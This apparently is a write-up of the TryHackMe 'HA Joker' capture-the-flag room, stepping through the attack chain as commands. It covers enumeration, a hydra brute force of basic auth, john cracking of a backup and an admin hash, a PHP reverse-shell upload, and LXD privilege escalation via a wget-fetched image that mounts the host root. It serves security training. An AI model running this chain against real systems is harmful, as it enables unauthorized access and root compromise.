TryHackMe: HA Joker CTF
## Enumerate services on target machine.
Command: mkdir nmap
Command: nmap -sS -sC -sV -oN nmap/initial 10.10.6.123
## What version of Apache is it?
Answer: See the picture above.
## What port on this machine not need to be authenticated by user and password?
## There is a file on this port that seems to be secret, what is it?
Command: gobuster dir -u http://10.10.6.123/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html
## There is another file which reveals information of the backend, what is it?
Command: gobuster dir -u http://10.10.6.123/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
## When reading the secret file, We find with a conversation that seems contains at least two users and some keywords that can be intersting, what user do you think it is?
## What port on this machine need to be authenticated by Basic Authentication Mechanism?
## At this point we have one user and a url that needs to be aunthenticated, brute force it to get the password, what is that password?
Command: hydra -l j**** -P /usr/share/wordlists/rockyou.txt -s 8080 10.10.247.37 http-get / -V
## Yeah!! We got the user and password and we see a cms based blog. Now check for directories and files in this port. What directory looks like as admin directory?
Command: gobuster dir -u http://10.10.6.123:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -U j**** -P h*****
## We need access to the administration of the site in order to get a shell, there is a backup file, What is this file?
## We have the backup file and now we should look for some information, for example database, configuration files, etc … But the backup file seems to be encrypted. What is the password?
Command: zip2john backup > hash.txt
Command: john hash.txt — wordlist=/usr/share/wordlists/rockyou.txt
## Remember that… We need access to the administration of the site… Blah blah blah. In our new discovery we see some files that have compromising information, maybe db? ok what if we do a restoration of the database! Some tables must have something like user_table! What is the super duper user?
Command: unzip backup
Command: cd db/
Command: cat joomladb.sql
## Super Duper User! What is the password?
Command: nano admin.txt
Command: john admin.txt — wordlist=/usr/share/wordlists/rockyou.txt
## At this point, you should be upload a reverse-shell in order to gain shell access. What is the owner of this session?
Getting a shell
Reverse shell on any CMS | VK9 Security
This trick works on any CMS you access. In case, you get the credentials either by brute force, disclosure, etc. This…
You can get the reverse shell from this page.
php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell
You can't perform that action at this time. You signed in with another tab or window. You signed out in another tab or…
## This user belongs to a group that differs on your own group, What is this group?
## Spawn a tty shell.
Command: script /dev/null -c bash
## In this question you should be do a basic research on how linux containers (LXD) work, it has a small online tutorial. Googling “lxd try it online”.
## Research how to escalate privileges using LXD permissions and check to see if there are any images available on the box.
Lxd Privilege Escalation - Hacking Articles
In this post we are going to describes how an account on the system that is a member of the lxd group is able to…
II: In our own terminal
Command: git clone https://github.com/saghul/lxd-alpine-builder.git
Command: cd lxd-alpine-builder
Command: sudo ./build-alpine
Command: python3 -m http.server 80
III: İn Target terminal
Command: cd /tmp
Command: wget http://your_ip/alpine-v3.15-x86_64-20220313_1211.tar.gz
Command: lxc image import ./alpine-v3.15-x86_64-20220313_1211.tar.gz --alias myimage
Command: lxc init myimage ignite -c security.privileged=true
## The idea here is to mount the root of the OS file system on the container, this should give us access to the root directory. Create the container with the privilege true and mount the root file system on /mnt in order to gain access to /root directory on host machine.
Command: lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Command: lxc start ignite
Command: lxc exec ignite /bin/sh
## What is the name of the file in the /root directory?
Command: cd /
Command: cd mnt
Command: cd root
Command: cd root
Note: “My purpose in coloring the credentials and marking them with a star is for you to work on yourself and understand the essence. Of course you can find the answers elsewhere. But it will not help you.
If you have any suggestions or comments, please let me know. Thanks. Have a good days.”